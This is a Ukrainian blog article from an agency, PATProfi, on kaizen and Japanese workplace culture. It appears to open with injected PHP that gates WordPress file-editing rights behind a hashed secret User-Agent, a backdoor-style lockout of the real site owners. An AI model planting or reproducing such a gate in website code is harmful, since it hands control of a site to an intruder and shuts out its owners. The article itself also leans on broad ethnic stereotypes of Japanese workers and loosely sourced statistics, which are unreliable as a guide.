if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Кайдзен: філософія на робочому місці у Києві, Україні за доступними цінами від агентства PATProfi

Кайдзен: філософія на робочому місці

Японці – як маленькі солдати: занадто добре керовані і відмінно мобілізовані. Так історично склалося, що вони з народження можуть злагоджено працювати в команді, тому як географія виховувала цю націю століттями. Півтори тисячі землетрусів на рік – звичайна справа. Щодня десь на різних кінцях країни падають зі столів документи і ручки. За землетрусами слідують цунамі, а ще з катаклізмів – тайфуни з Тихого океану. Як тут не навчитися командному духу і миттєвому реагуванню в умовах будь-якого форс-мажору?

А ще японці вкрай завзяті і старанні: приходять на роботу на годину раніше, беруть понаднормові, відпочивають не більше п’яти днів на рік, і то, якщо пощастить. Нарада об 11 вечора нікого не дивує, а наприкінці робочого дня, швидше за все, доведеться зануритися у неформальне спілкування з колегами – номікай – корпоратив у нашому розумінні.

Номікай (яп. «Номи» 飲 み – пити і «кай» 会 зустріч) – пити разом.

І тут виникає думка: а чи варто взагалі їхати через все місто додому, щоб переночувати? Насправді, у них все продумано і вже створено для комфортного існування в робочому «мурашнику». Поруч з їх офісами побудовані недорогі міні-готелі, а найголовнішим досягненням XX століття своєї країни японці вважають локшину швидкого приготування. Але є і мінуси. Це нація трудоголіків, де смерть на робочому місці (каросі) нікого не дивує і б’є всі рекорди: до 10 тисяч осіб на рік! Варто відзначити, що вмирають вони від перепрацювання у білих сорочках, розташувавшись у зручному офісі, а не під час важкої праці шахтарів.

Каросі (яп. 過 労 死 – смерть від переробки) – професійна раптова смерть.

Але при цьому, якщо на Заході заснути від перевтоми вважається неприйнятним, то в японській бізнес-культурі дозволено (і навіть почесно) перейти в режим «інемурі» – дрімання на робочому місці. Багато співробітників спеціально дрімають, щоб показати своїм босам, як вони багато працюють.

Інемурі (яп. 居 眠 り) – в перекладі означає перебувати на місці і спати.

В Японії кожен знає своє місце у виробничому процесі: проявити себе, зробити що-небудь за іншого для прискорення процесу призведе до догани всім колегам, які мають зв’язок по ієрархічній драбині з «злочинцем». Будь-яке демонстрування розуму і переваги відсікається з дитинства. Це армія слухняних солдатів.

Але чи завжди ефективна така праця? Японці можуть розтягувати задоволення, просиджуючи годинами над нескладною роботою, але їм все одно буде здаватися, що все зроблено недостатньо ретельно. Платять їм за відпрацьовані години, а терміни деяких завдань за складністю перебільшені, але, незважаючи на це, вони скрупульозно занурюються у процес і мало не під мікроскопом вивчають кожне доручення.

Нам багато чого незрозуміло у їхній культурі, вони більше схожі на роботів, ніж на людей, але є і позитивні моменти, яким просто необхідно навчитися працівникам інших країн для ідеального ведення справ. Для японців робота – культ, вони не скачуть з місця на місце, і навіть якщо воно не влаштовує за всіма параметрами, чи варто засмучуватися, коли його можна перетворити в ідеальне. У японську бізнес-культуру щільно увійшов такий феномен, як кайдзен – безперервний процес вдосконалення.

Кайдзен (яп. 改善) – один з підходів до поліпшення роботи організації.

Кайдзен – це система вдосконалення на підприємстві і вона повинна відбуватися безперервно. Більше 60-ти років тому дана практика почала застосовуватися фірмою Toyota і вона спромоглася неймовірних успіхів: компанія вийшла на лідируючі позиції в автомобільній галузі, і з нею було складно змагатися конкурентам. Вважається, що секрет успіху компанії – в ощадливому виробництві (від англ. Lean production, lean manufacturing – «худе виробництво»). Вона має на увазі постійну боротьбу за якість.

«Все, що може бути покращено, має бути покращено. Покращено ж може бути практично все »- свідчить слоган компанії, який належить Сакічі Тойода, який вважав, що успіх будь-якої компанії тільки на 5% залежить від таланту людей і на 95% – від їх старанності. Бережливе виробництво – це частина системи кайдзен.

Так що ж у себе включає безперервний процес вдосконалення? Це постійне поліпшення всіх процесів в цілому і окремо. Глобально мислити і впроваджувати нововведення занадто витратно, в той час як кайдзен – майже непомітний і безкоштовний процес. Масштабні зміни вимагають вкладень у вигляді нових технологій. Але чи потрібні вони? Може бути, спочатку скористатися існуючим потенціалом, впроваджуючи кайдзен?

Елементи кайдзен:

Командна робота. Всі співробітники повинні працювати злагоджено і разом, навчаючи один одного і допомагаючи.

  • Персональна дисципліна. Стежити за собою необхідно у всьому. Це стосується і якості роботи, і швидкості виконання, і ефективності праці, і дотримання регламентів і вимог.
  • Мотивація. Незалежно від успіху або провалу компанії, команда працівників повинна заохочуватися. Хороші умови праці, грамотна система мотивації разом зі сприятливою атмосферою створюють ідеальний простір.
  • Групи з контролю якості. Це один з важливих елементів системи кайдзен. Незалежно від рівня доходу і рангу, люди повинні збиратися у гуртки для обміну ідеями, навичками і технологіями. Обмін інформацією дозволяє оцінити власну ефективність у порівнянні з роботою інших співробітників.
  • Ініціативи. Співробітники будь-якого рангу повинні мати можливість вільно висловлюватися. Пропозиції можуть бути будь-якими, навіть абсурдними, але розглянуті повинні бути всі в будь-якому випадку.

Ми звикли мислити більш кардинально: все і відразу, тут і зараз! Впровадження системи кайдзен в наш менеджмент навчило б уникати високих витрат на виробництві, відповідати світовим стандартам і дозволило б досягти більшої конкурентоспроможності на вітчизняному та світовому ринках. Також система кайдзен здатна навчити детальному і методичному вдосконаленню своєї особистості.

Ми часто повторюємо, що «дявол криється в деталях», в той час як цими деталями ніхто не займається, але ж велике – суть переваги малих елементів. Застосування системи кайдзен підійде для компанії будь-якого розміру і сфери, адже найголовніше в цій філософії – навчитися сприймати цінність своєї праці, ставитися до будь-якого вчинку і справі, яким би незначним воно не було, з належною увагою і ретельністю.

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.